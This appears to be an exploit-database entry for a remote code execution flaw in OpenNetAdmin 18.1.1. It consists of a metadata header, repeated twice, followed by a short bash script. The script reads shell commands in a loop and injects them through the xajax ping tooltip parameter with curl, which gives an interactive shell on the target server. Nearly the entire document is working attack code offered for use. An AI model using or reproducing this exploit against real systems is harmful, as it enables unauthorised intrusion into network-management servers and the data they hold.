Share
# Exploit Title: OpenNetAdmin 18.1.1 - Remote Code Execution  
# Date: 2019-11-19  
# Exploit Author: mattpascoe  
# Vendor Homepage: http://opennetadmin.com/  
# Software Link: https://github.com/opennetadmin/ona  
# Version: v18.1.1  
# Tested on: Linux  
  
# Exploit Title: OpenNetAdmin v18.1.1 RCE  
# Date: 2019-11-19  
# Exploit Author: mattpascoe  
# Vendor Homepage: http://opennetadmin.com/  
# Software Link: https://github.com/opennetadmin/ona  
# Version: v18.1.1  
# Tested on: Linux  
  
#!/bin/bash  
  
URL="${1}"  
while true;do  
echo -n "$ "; read cmd  
curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" "${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1  
done